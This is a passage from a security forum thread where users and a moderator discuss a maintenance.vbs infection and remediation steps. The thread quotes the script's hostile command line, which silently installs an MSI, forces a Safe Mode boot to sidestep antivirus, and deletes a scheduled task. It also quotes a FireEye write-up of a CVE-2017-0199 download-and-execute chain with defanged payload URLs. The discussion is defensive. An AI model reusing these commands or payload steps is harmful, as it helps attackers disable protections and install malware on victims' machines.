itman 1,659 Posted November 20, 2020 Share Posted November 20, 2020 (edited) Also, how could this bugger delete ekrn.exe? Per maintenance.vbs script: strArgs = "%comspec% /C %SystemRoot%\System32\msiexec.exe /i %SystemRoot%\System32\ServiceInstaller.msi /qn & del %SystemRoot%\System32\ServiceInstaller.msi & %SystemRoot%\System32\bcdedit.exe /set {current} safeboot minimal & %SystemRoot%\System32\powercfg.exe /hibernate off & schtasks /Delete /TN ""Microsoft\Windows\Maintenance\InstallWinSAT"" /F" Note the reference to "safeboot." Eset unfortunately is not functional in Safe mode. The next time the PC was rebooted , it was in Safe mode. At this point, the attacker can do whatever he wished in regards to disabling security software. More disturbing, Snatch ransomware also uses the "boot into Safe mode" technique to encrypt files: Quote To take advantage of anti-malware solutions not loading in Safe Mode, the Snatch ransomware component installs itself as a Windows service dubbed SuperBackupMan capable of running in Safe Mode that can't be stopped or paused, and then force restarts the compromised machine. https://www.bleepingcomputer.com/news/security/snatch-ransomware-reboots-to-windows-safe-mode-to-bypass-av-tools/ Edited November 20, 2020 by itman Link to comment Share on other sites More sharing options...
itman 1,659 Posted November 21, 2020 Share Posted November 21, 2020 I was able to find an analysis of StartupCheck.vbs at Joe's Cloud Sandbox here: https://www.joesandbox.com/analysis/243006/0/html which they determined to be malicious. Using the file hash shown, went to VirusTotal to see if anyone detects it. The result was no one detects it. At least an explanation why this bugger "is flying under the AV radar" for so long. Link to comment Share on other sites More sharing options...
itman 1,659 Posted November 21, 2020 Share Posted November 21, 2020 (edited) Found one bugger using malicious maintenance.vbs script: Quote FireEye recently detected malicious Microsoft Office RTF documents that leverage CVE-2017-0199, a previously undisclosed vulnerability. This vulnerability allows a malicious actor to download and execute a Visual Basic script containing PowerShell commands when a user opens a document containing an embedded exploit. FireEye has observed Office documents exploiting CVE-2017-0199 that download and execute malware payloads from different well-known malware families. FireEye shared the details of the vulnerability with Microsoft and has been coordinating public disclosure timed with the release of a patch by Microsoft to address the vulnerability, which can be found here. The vulnerability bypassed most mitigations prior to patch availability; however, FireEye email and network products detected the malicious documents. FireEye recommends that Microsoft Office users apply the patch from Microsoft. Winword.exe makes a request to the DCOMLaunch service, which in turn causes the svchost.exe process hosting DCOMLaunch to execute mshta.exe. Mshta.exe then executes the script embedded in the malicious HTA document. Figure 4 shows the deobfuscated VBScript from the first stage download. The script shown in Figure 4 performs the following malicious actions: Terminates the winword.exe process with taskkill.exe to hide the prompt shown in Figure 1. Downloads a VBScript file from http[:]//www.modani[.]com/media/wysiwyg/ww.vbs and saving it to %appdata%\Microsoft\Windows\maintenance.vbs Downloads a decoy document from http[:]//www.modani[.]com/media/wysiwyg/questions.doc and saving it to %temp%\document.doc Cleans up the Word Resiliency keys for Word versions 15.0 and 16.0 so that Microsoft Word will restart normally Executes the malicious stage two VBScript: %appdata%\Microsoft\Windows\maintenance.vbs Opens the decoy document, %temp%\document.doc, to hide the malicious activity from the user Once executed, the downloaded stage two VBScript (ww.vbs/maintenance.vbs) performs the following actions: Writes an embedded obfuscated script to %TMP%/eoobvfwiglhiliqougukgm.js Executes the script The obfuscated eoobvfwiglhiliqougukgm.js script performs the following actions when executed: Attempts to delete itself from the system Attempts to download http[:]//www.modani[.]com/media/wysiwyg/wood.exe (at most 44 times), and save the file to %TMP%\dcihprianeeyirdeuceulx.exe Executes %TMP%\dcihprianeeyirdeuceulx.exe https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html One possible way maintenance.vbs landed on the OP's device. Of note in this case, it was in a %AppData% directory. Edited November 21, 2020 by itman Link to comment Share on other sites More sharing options...
Jondety25 0 Posted November 22, 2020 Share Posted November 22, 2020 On 11/20/2020 at 6:33 PM, itman said: Hard to say what went on in this device in the week or so since this malware was detected. From MBAM's findings to date, it appears to be coin mining related. But who knows if a backdoor or more malware, spyware, etc. were also installed in the interim? If it were my device, I would indeed reformat and reinstall Win 10 20H2. When i had problem, i make backup and reinstall win10 and formating C:\. First reinstall antivirus and scan may backup for the first time and.found malwares that before didn't found. Afetar a week, the.problem.occours.again. so I realized after that my wife mobile was infected and it was.possivel spreadimg by wifi. So i had to restore all.mobiles and format PC again. After this the problem was fixed. Link to comment Share on other sites More sharing options...
itman 1,659 Posted November 22, 2020 Share Posted November 22, 2020 (edited) 11 hours ago, Jondety25 said: When i had problem, i make backup and reinstall win10 and formating C:\. First reinstall antivirus and scan may backup for the first time and.found malwares that before didn't found. Afetar a week, the.problem.occours.again. so I realized after that my wife mobile was infected and it was.possivel spreadimg by wifi. So i had to restore all.mobiles and format PC again. After this the problem was fixed. Good point. Repeated infections after a drive reformat and OS installation would most definitely point to a network security issue external to device being reinfected. Problem is one has to go through this process to confirm it is the source of repeated infections. Additionally, the above is not the only source of residual malware. The malware may be firmware based residing on a device attached to the PC or a component of the motherboard. There also have been instances where malware has persisted a normal drive reformat. This is why it is recommended to perform an industrial grade software based wipe of hard drive, or replace the drive entirely if the same malware persists. Edited November 22, 2020 by itman Link to comment Share on other sites More sharing options...
ProblemNeedsSolution 0 Posted November 23, 2020 Author Share Posted November 23, 2020 17 hours ago, itman said: Good point. Repeated infections after a drive reformat and OS installation would most definitely point to a network security issue external to device being reinfected. Problem is one has to go through this process to confirm it is the source of repeated infections. Additionally, the above is not the only source of residual malware. The malware may be firmware based residing on a device attached to the PC or a component of the motherboard. There also have been instances where malware has persisted a normal drive reformat. This is why it is recommended to perform an industrial grade software based wipe of hard drive, or replace the drive entirely if the same malware persists. In my case I believe the thing was present in the backup itself so that is why it kept coming back. Just to be sure I disabled google sync on my machine and deleted all the extensions and cookies. I keep doing checks with the anti rootkit tool from MB and I also keep an eye on the WIndows/system32 folders and so far everything seems to be clean. Link to comment Share on other sites More sharing options...
itman 1,659 Posted November 23, 2020 Share Posted November 23, 2020 (edited) 7 hours ago, ProblemNeedsSolution said: In my case I believe the thing was present in the backup itself so that is why it kept coming back. Just to be sure I disabled google sync on my machine and deleted all the extensions and cookies. I keep doing checks with the anti rootkit tool from MB and I also keep an eye on the WIndows/system32 folders and so far everything seems to be clean. It is impossible to determine what the malware did when you started the PC in normal mode and all security protection was disabled. At a minimum, you should change all your passwords; especially those pertaining to financial web sites. If you used e-mail when all security protection was disabled, your passwords there should be changed. You should also run a full Eset custom scan at Admin level and see if Eset can find any residual malware. Edited November 23, 2020 by itman Link to comment Share on other sites More sharing options...
ProblemNeedsSolution 0 Posted November 26, 2020 Author Share Posted November 26, 2020 On 11/23/2020 at 4:27 PM, itman said: It is impossible to determine what the malware did when you started the PC in normal mode and all security protection was disabled. At a minimum, you should change all your passwords; especially those pertaining to financial web sites. If you used e-mail when all security protection was disabled, your passwords there should be changed. You should also run a full Eset custom scan at Admin level and see if Eset can find any residual malware. I did checks with Eset at admin level and with MB too and it stayed clean since the day of discovery of Maintenance.vbs. They should really work this into an update at Eset so that they could be the first useful AW SW against this Anyways thanks for the help people my issue is solved. Link to comment Share on other sites More sharing options...
Administrators Marcos 5,074 Posted November 26, 2020 Administrators Share Posted November 26, 2020 Maintenance.vbs is benign. Please provide c:\windows\System32\ServiceInstaller.msi which is run by the vbs script. Link to comment Share on other sites More sharing options...
Recommended Posts